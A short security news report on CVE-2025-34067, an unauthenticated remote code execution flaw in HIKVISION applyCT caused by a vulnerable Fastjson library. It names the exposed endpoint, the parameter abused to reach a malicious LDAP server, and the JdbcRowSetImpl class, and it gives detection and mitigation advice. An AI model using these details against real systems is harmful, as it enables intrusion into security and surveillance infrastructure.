Organizations using affected HIKVISION applyCT systems face risks of data breaches, service disruptions, and potential compromise of their entire security infrastructure. Assigned CVE-2025-34067 with a maximum CVSS score of 10.0, this vulnerability stems from the platform’s use of a vulnerable version of the Fastjson library, exposing millions of surveillance devices worldwide to potential compromise. While specific patches have not been detailed in current advisories, users should contact HIKVISION support for immediate remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available. The platform’s extensive adoption makes this vulnerability particularly concerning, as it provides centralized control over multiple security devices and surveillance systems. The attack mechanism involves manipulating the JdbcRowSetImpl class to establish connections with untrusted LDAP servers, effectively bypassing security controls. This represents a classic case of CWE-502 Deserialization of Untrusted Data combined with CWE-917 Expression Language Injection, where insufficient input validation allows unauthorized class loading and code execution. By manipulating the datasource parameter to point to a malicious LDAP server, attackers can achieve remote code execution on the underlying system. Exploits Fastjson library via malicious JSON to /bic/ssoService/v1/applyCT endpoint using LDAP connections. CVE-2025-34067 (CVSS 10.0) in HIKVISION applyCT allows unauthenticated remote code execution. Monitoring for unusual network traffic to the /bic/ssoService/v1/applyCT endpoint can help detect attempts at exploitation.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 04 Jul 2025 10:10:13 +0000